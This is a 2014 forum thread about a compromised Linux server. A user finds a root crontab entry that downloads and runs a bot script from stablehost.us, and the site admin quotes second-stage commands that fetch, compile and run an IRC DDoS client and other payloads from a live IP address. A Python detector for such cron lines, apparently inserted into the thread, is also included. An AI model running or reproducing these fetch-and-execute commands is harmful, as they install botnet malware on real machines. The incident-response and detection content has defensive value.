SMS Forum Index » Bugs

Stablehost vulnerability!
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 8:10 am    Post subject: Stablehost vulnerability!

Hi all.
I think I was infected.
The service crond is not working - this is how I found out,
and the content of /var/spool/cron/crontabs/root is as follows:

Code:

crontab 2.3.3
crontab file <opts>  replace crontab from file
crontab -    <opts>  replace crontab from stdin
crontab -u user      specify user
crontab -l [user]    list crontab for user
crontab -e [user]    edit crontab for user
crontab -d [user]    delete crontab for user
crontab -c dir       specify crontab directory
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1


I found only this link telling something about this.

Do I have to reinstall?
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 9:54 am    Post subject:

You are infected alright, although I wouldn't call this a bug...

The first thing is to try to find out where you were infected from, so that even if you reinstall you won't get infected again...

Looking at the script, you can see the source and what it infects, although there is a straightforward description at the top of the a.c file:
Code:
 This is a IRC based distributed denial of service client.

Code:
wget http://205.237.100.170/manual/a.c -O /tmp/init.c;
gcc -o /tmp/init /tmp/init.c;
chmod +x /tmp/init;
/tmp/init;
rm -rf /tmp/init /tmp/init.c;

wget http://205.237.100.170/manual/pb -O /tmp/p;perl /tmp/p;rm -rf /tmp/p;

wget http://205.237.100.170/manual/b -O /tmp/b;chmod +x /tmp/b;/tmp/b;rm -rf /tmp/b;


So do you have an idea how you could have been exposed?
For instance, is your root password the same as one you use for an email address or another service, or might the clients you use to connect have a keylogger?

I'm downloading the sources to take a look at them...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
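A check a defender could run against the root crontab quoted in the first post and against the second-stage chain quoted in this reply, added here as an example; it is not code from the thread or from the SMS project. The cron-line parsing rules, the benign entry with the placeholder host example.invalid and the list of temp directories are my assumptions.

```python
import re
# Constructed samples from the thread: the root crontab from the first post (usage text dumped
# ahead of the real entry, plus one benign entry with a placeholder host that I added) and the
# second-stage chain quoted in the reply.
SAMPLE_CRONTAB = (
    "crontab 2.3.3\ncrontab -l [user]    list crontab for user\n"
    "@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;"
    "sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1\n"
    "0 3 * * * /usr/bin/wget -q https://example.invalid/status -O /var/tmp/status.txt\n"
)
SAMPLE_STAGE2 = (
    "wget http://205.237.100.170/manual/a.c -O /tmp/init.c;\ngcc -o /tmp/init /tmp/init.c;\n"
    "chmod +x /tmp/init;\n/tmp/init;\nrm -rf /tmp/init /tmp/init.c;\n"
)

CRON_SPECIAL = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)\s+(.*)$")
CRON_FIELDS = re.compile(r"^((?:[\d*,/-]+\s+){5})(.*)$")  # numeric/wildcard fields only
SPLIT = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")              # simple-command separators
FETCHERS = {"wget", "curl", "fetch", "tftp"}
RUNNERS = {"sh", "bash", "perl", "python", "php", "gcc"}   # interpreters and compiler
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")             # assumed drop locations

def cron_entries(text):
    """Yield (schedule, command) for real cron lines; usage junk and VAR=value lines are skipped."""
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_SPECIAL.match(line)
        if m:
            yield "@" + m.group(1), m.group(2)
            continue
        m = CRON_FIELDS.match(line)
        if m:
            yield m.group(1).strip(), m.group(2)

def classify(cmd):
    """Label one simple command: fetch (downloads a URL), exec (runs a script, compiler or /tmp path), other."""
    toks = cmd.split()
    prog = toks[0].rsplit("/", 1)[-1]
    if prog in FETCHERS and re.search(r"\b(https?|ftp)://", cmd):
        return "fetch"
    if prog in RUNNERS or toks[0].startswith(TMP_DIRS):
        return "exec"
    return "other"

def is_download_and_execute(command):
    """True when a fetch step is followed, in the same command chain, by an exec step."""
    labels = [classify(c) for c in SPLIT.split(command) if c.strip()]
    return "fetch" in labels and "exec" in labels[labels.index("fetch") + 1:]

def suspicious_cron_entries(text):
    """Cron entries whose command downloads something and then runs it."""
    return [(s, c) for s, c in cron_entries(text) if is_download_and_execute(c)]
```

The same chain test applies to the second stage once its lines are joined with `;`, which is how `is_download_and_execute(SAMPLE_STAGE2.replace("\n", ";"))` flags it.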
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 10:32 am    Post subject:

Hi,
You're right, it is not a bug at all, but I put it here since it is the most recent topic about vulnerabilities.

Well, I actually have 2 machines affected. I am the only root user and there are no other users. I can't imagine what happened; I suspect something regarding the DNS (bind) service, because on one machine, even though it shows bind is working, it can't be reached from outside by pinging domain.name.

I can let you inspect the machines... since I am confident in you.
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 10:39 am    Post subject:

I would like to take a look, if you don't mind...

Googling it, they match those attacks with Shellshock, so it might be an app you use that has shell access?
You can send me a temporary password via email, to be more secure...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 10:59 am    Post subject:

Sent by PM (probably twice by mistake...)
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:02 am    Post subject:

Oh... I forgot, I must say that I deleted 2 weird executable files in /tmp, and also deleted some files in /var/www/cgi-bin. Those from cgi, I kept them.
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 11:02 am    Post subject:

Are you sure you sent it to me, because I didn't get any...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:03 am    Post subject:

Yes, sure, by PM.
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 11:09 am    Post subject:

OK! My bad, my inbox was 100% full, so can you please send it again...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:11 am    Post subject:

Sent now.
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:15 am    Post subject:

I can confirm the bind service was affected (despite it showing it is running). I switched to another DNS server (the other infected machine) and now the domain can be pinged.
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 11:21 am    Post subject:

I sent you a PM, did you get it...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:23 am    Post subject:

Yes, I received it and gave a response 1 min ago.
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

Posted: Wed Oct 22, 2014 11:27 am    Post subject:

Send me a test message to tudorsps at gmail dot com. I'll use the sender address to give you details.
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

Posted: Wed Oct 22, 2014 11:32 am    Post subject:

OK...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com